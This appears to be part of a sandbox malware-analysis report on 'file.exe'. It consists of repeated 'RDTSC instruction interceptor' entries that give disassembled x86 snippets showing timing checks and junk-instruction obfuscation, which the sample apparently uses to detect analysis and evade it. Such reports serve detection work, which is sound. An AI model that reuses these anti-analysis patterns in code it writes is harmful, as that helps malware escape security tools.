Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121FB5F second address: 104E9AB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEE1507F275h 0x00000008 jmp 00007FEE1507F26Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 cmc 0x00000011 stc 0x00000012 push dword ptr [ebp+122D053Dh] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FEE1507F268h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 call dword ptr [ebp+122D2EE3h] 0x00000038 pushad 0x00000039 jmp 00007FEE1507F272h 0x0000003e xor eax, eax 0x00000040 jg 00007FEE1507F277h 0x00000046 jmp 00007FEE1507F271h 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f xor dword ptr [ebp+122D37FBh], esi 0x00000055 mov dword ptr [ebp+122D2C54h], eax 0x0000005b jmp 00007FEE1507F26Bh 0x00000060 mov esi, 0000003Ch 0x00000065 pushad 0x00000066 mov dword ptr [ebp+122D37FBh], esi 0x0000006c mov dword ptr [ebp+122D37FBh], ebx 0x00000072 popad 0x00000073 mov dword ptr [ebp+122D38C0h], esi 0x00000079 add esi, dword ptr [esp+24h] 0x0000007d add dword ptr [ebp+122D38E1h], esi 0x00000083 lodsw 0x00000085 sub dword ptr [ebp+122D38C0h], edi 0x0000008b add eax, dword ptr [esp+24h] 0x0000008f sub dword ptr [ebp+122D38E1h], eax 0x00000095 mov ebx, dword ptr [esp+24h] 0x00000099 cmc 0x0000009a push eax 0x0000009b push ebx 0x0000009c push eax 0x0000009d push eax 0x0000009e push edx 0x0000009f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1223C1A second address: 1223C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1223C1E second address: 1223C2B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE1507F266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1223C2B second address: 1223C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FEE1472CB5Dh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007FEE1472CB62h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1224482 second address: 1224489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122473D second address: 1224762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE1472CB62h 0x00000009 popad 0x0000000a jnp 00007FEE1472CB62h 0x00000010 je 00007FEE1472CB56h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1224A7A second address: 1224A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1224BCC second address: 1224BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1224BD0 second address: 1224BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1224BD8 second address: 1224BDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1224BDD second address: 1224BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1224BE7 second address: 1224C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE1472CB5Dh 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEE1472CB5Dh 0x00000013 ja 00007FEE1472CB5Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1224C12 second address: 1224C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1224C16 second address: 1224C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FEE1472CB56h 0x0000000a jc 00007FEE1472CB56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122938A second address: 122938E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12294F6 second address: 1229500 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEE1472CB5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12297D1 second address: 12297D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229AC9 second address: 1229ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229ACD second address: 1229AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEE1507F266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229AD9 second address: 1229AE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229BED second address: 1229BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229EEC second address: 1229EF8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEE1472CB56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229EF8 second address: 1229F3E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEE1507F26Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FEE1507F279h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FEE1507F266h 0x00000018 jmp 00007FEE1507F274h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229F3E second address: 1229F81 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEE1472CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FEE1472CB63h 0x00000010 jmp 00007FEE1472CB65h 0x00000015 jmp 00007FEE1472CB5Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229F81 second address: 1229F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122A2C3 second address: 122A2CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229053 second address: 1229057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229057 second address: 122905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122905D second address: 1229078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 jno 00007FEE1507F26Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1229078 second address: 1229083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FEE1472CB56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F7260 second address: 11F7265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F787A second address: 11F78FA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEE1472CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FEE1472CB60h 0x0000000f popad 0x00000010 xor dword ptr [esp], 718D53C2h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FEE1472CB58h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov edx, dword ptr [ebp+122D1C81h] 0x00000037 call 00007FEE1472CB59h 0x0000003c push ecx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 pop ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edi 0x00000048 pop edi 0x00000049 pop eax 0x0000004a pop edx 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jnl 00007FEE1472CB68h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F78FA second address: 11F7900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F7900 second address: 11F7926 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jns 00007FEE1472CB62h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ebx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F7A16 second address: 11F7A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F80CA second address: 11F813C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FEE1472CB60h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FEE1472CB58h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 or dword ptr [ebp+122D353Ch], ebx 0x0000002e movsx edi, si 0x00000031 push 0000001Eh 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FEE1472CB58h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d xor dword ptr [ebp+122D35B0h], edx 0x00000053 nop 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 pop eax 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F82B6 second address: 11F82BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F82BA second address: 11F82D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FEE1472CB5Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FEE1472CB56h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F82D8 second address: 11F82DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F82DE second address: 11F82E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F84D1 second address: 11F851C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FEE1507F275h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007FEE1507F279h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FEE1507F26Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F863F second address: 11F8660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE1472CB68h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F8660 second address: 11F8664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122E91C second address: 122E92A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122E92A second address: 122E944 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FEE1507F26Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FEE1507F266h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122ED43 second address: 122ED4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122ED4B second address: 122ED52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122EEB0 second address: 122EED1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB69h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122EED1 second address: 122EED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122EED5 second address: 122EF11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB65h 0x00000007 jmp 00007FEE1472CB5Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEE1472CB5Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122EF11 second address: 122EF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122F057 second address: 122F0A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB68h 0x00000007 jmp 00007FEE1472CB60h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEE1472CB69h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122F0A4 second address: 122F0AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123BB74 second address: 123BB99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Bh 0x00000007 jmp 00007FEE1472CB63h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123BB99 second address: 123BBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEE1507F266h 0x0000000a pop ebx 0x0000000b jbe 00007FEE1507F26Eh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123BBB5 second address: 123BBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123BBC0 second address: 123BBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123BBC4 second address: 123BBE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FEE1472CB60h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FEE1472CB5Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123AB07 second address: 123AB0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123AC6C second address: 123AC73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123B309 second address: 123B30D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123FAD9 second address: 123FAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEE1472CB69h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123F50D second address: 123F531 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE1507F27Dh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123F531 second address: 123F537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123F81A second address: 123F847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FEE1507F272h 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 jg 00007FEE1507F266h 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123F847 second address: 123F84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123F84B second address: 123F851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1241EC8 second address: 1241EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEE1472CB5Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1241EDC second address: 1241EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1241EE0 second address: 1241EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1241EEA second address: 1241F11 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEE1507F266h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEE1507F274h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1241BBB second address: 1241BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1241BC3 second address: 1241BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1241BCA second address: 1241C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FEE1472CB63h 0x0000000a jnp 00007FEE1472CB56h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jg 00007FEE1472CB56h 0x0000001e jmp 00007FEE1472CB5Fh 0x00000023 jo 00007FEE1472CB56h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1241C0C second address: 1241C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEE1507F266h 0x0000000a jnl 00007FEE1507F266h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1241C1C second address: 1241C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124553E second address: 1245549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245549 second address: 1245563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEE1472CB56h 0x0000000a jmp 00007FEE1472CB60h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245563 second address: 1245567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A0B9 second address: 124A0F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB66h 0x00000007 jmp 00007FEE1472CB66h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FEE1472CB62h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A0F1 second address: 124A100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEE1507F266h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A402 second address: 124A40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A40D second address: 124A425 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEE1507F266h 0x00000008 je 00007FEE1507F266h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007FEE1507F26Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1250171 second address: 1250175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1250175 second address: 125019D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEE1507F266h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FEE1507F277h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
